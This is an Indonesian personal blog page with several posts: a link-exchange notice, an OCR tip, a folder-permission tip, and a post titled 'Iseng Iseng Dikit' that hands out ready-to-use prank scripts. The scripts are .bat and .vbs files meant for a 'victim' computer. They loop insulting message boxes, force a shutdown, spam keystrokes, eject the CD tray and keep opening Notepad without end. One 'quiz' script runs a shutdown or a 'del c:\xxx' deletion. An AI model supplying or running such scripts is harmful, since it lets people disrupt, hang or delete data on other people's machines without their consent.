Loading...
Featured Articles
All Stories

18 January 2012

Bertukar Link

Bertukar Link

Syarat Tukar Link:
- Blog anda terdaftar di Search Engine dan halaman tukar link anda terindeks di Google.
- Terdapat meta tag search engine pada template.
- Halaman blog muncul pada hasil pencarian Google.

  • Sebelum melakukan tukar link, baca dahulu persyaratan diatas .
  • Apabila syarat terpenuhi, maka silakan copy kode di bawah ini ke Blog atau Website kamu.




  • Setelah kamu pasang, silahkan tunjukkan ke saya Anchor Text, URL Blog melalui komentar di postingan ini atau Script Link Exchange di blog kamu.
  • Apabila kamu sudah memasangnya, maka saya pun juga akan memasang link yang kamu berikan.
  • Thank buat yang udah tukar link

Berikut kumpulan Link teman-teman yang sudah saya pasang:



·   18

13 December 2011

merubah image menjadi teks(ketikan)

kali ni saya akan berbagi tips n trick tentang cara merubah foto tow image (.jpg, .gif, .png, .bmp, dll) menjadi sebuah ketikan(teks), seperti .doc . .
Beginilah caranya:
  1. scan semua kertas yang ingin kita ketik.
  2. buka situs ini http://www.onlineocr.net/
  3. ga usah register dan bla bla bla.
  4. klik Browse.
  5. cari file yang tadi kita scan (JPG, BMP, TIFF, GIF, PNG, DLL) bebas.
  6. klik Upload.
  7. tunggu sebentar biarkan robot “internet” yang mengerjakan.
  8. masukan kode.
  9. recognize.
  10. download deh file yang sudah menjadi Teks.
low begini kan jadi hemat waktu ga usah ketik-ketik lagi
hehe…..
·   12

08 December 2011

Memproteksi Folder

Mungkin yang di benak anda bahwa memproteksi folder disini dengan password, TIDAK. Ini bukan memakai password yang anda kira sebelumnya, ini hanya memanfaatkan security file sharing. Jadi, bukan menggunakan password dengan bantuan batch file. Sangat simple sih, berikut caranya :
1. Pastikan “use simple file sharing” sudah di uncheck yang ada di Tools (sewaktu membuka explorer/My Computer) > Folder Options > View > Scroll ampe bawah dan yang merah2 ini harus di uncheck(gak ada checklistnya)



2. sesudah di uncheck “use simple file sharing”nya, lalu anda menuju ke file yang ingin anda proteksi supaya tidak bisa dibuka oleh orang lain (contoh folder saya :-P ).

3. Lalu Klik kanan pada folder anda yang ngin diproteksi tadi lalu Klik Properties seperti pada gambar

4. jika sudah lalu ke tab Security dan anda akan diperlihatkan seperti ini .

5. lalu klik kepala orang yang berdua itu, jangan yang sendiri, supaya juga memproteksi dalam 1 jaringan juga.
6. Lalu Check list semuanya dan akan jadi seperti ini lalu klik OK.

Sudah selesai anda memproteksi foder anda dari tangan-tangan orang ‘awam’, mungkin para mastah komputer tau akan hal ini, dan bila folder ini di buka maka akan muncul message box seperti ini

Kqqkqkqk, akhirnya sudah diproteksi folder anda dan bila ingin mengembalikan untuk bisa dibuka kembali Uncheck saja yang ada di tab security di Properties foldernya. Oiya, ini juga bisa dipakai di semua file lohh,, jadi bukan folder doang yang bisa di proteksi seperti ini, jadinya semua file bisa di proteksi seperti ini, lumayan buat proteksi file-file pribadi :-P
·   14

Iseng Iseng Dikit gapapa kan

Mau iseng? bagus juga untuk belajar jail neh…. Segala resiko ditanggung sendiri ya, jangan salahin saya :D
Saya hanya sharing aja..

1. Membuat message box yang selalu keluar :
copy:
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
Simpan dengan format *.bat
Yang ini hanya bisa di close mungkin dengan process hacker gan, sama taskmngr nggak bisa …
2. Bikin komputer korban shutdown dan message box keluar
copy:
@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
Simpan dengan format *.bat juga …
3. Membuat Capslock terus menyala
copy:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan format *.vbs, bisa di close sama Task Manager atau PH
4. Membuka dan menutup CD/DVD komputer korban
copy:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan format *.vbs juga ya gan!
5. Membuat vbscript terus muncul
copy:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Simpan dengan format *.vbs, mungkin sama taskmngr bisa di close …
6. Terus – menerus menekan tombol “backspace”
copy:
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Simpan dengan format *.vbs, pasti yang berformat *vbs bisa di kill sama taskmngr
7. Otomatis menulis “Lu jelek banget sih” di notepad atau di word
copy:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
Simpan dengan format *.vbs, sendkeysnya bisa di ganti …
8. Terus – menerus membuka notepad
copy:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan dengan format *.bat, bisa juga di ganti apa yang mau di bukanya, asalkan tau di mana disimpennya …
9. Sama dengan trik nomor tujuh, tapi berbeda khas
copy:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
Ganti sendkeysnya, dan simpan dengan format *.vbs …
10. Membuat kuis
copy:
@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan dengan format *.bat …


Selamat mencoba ... ^_^
·   8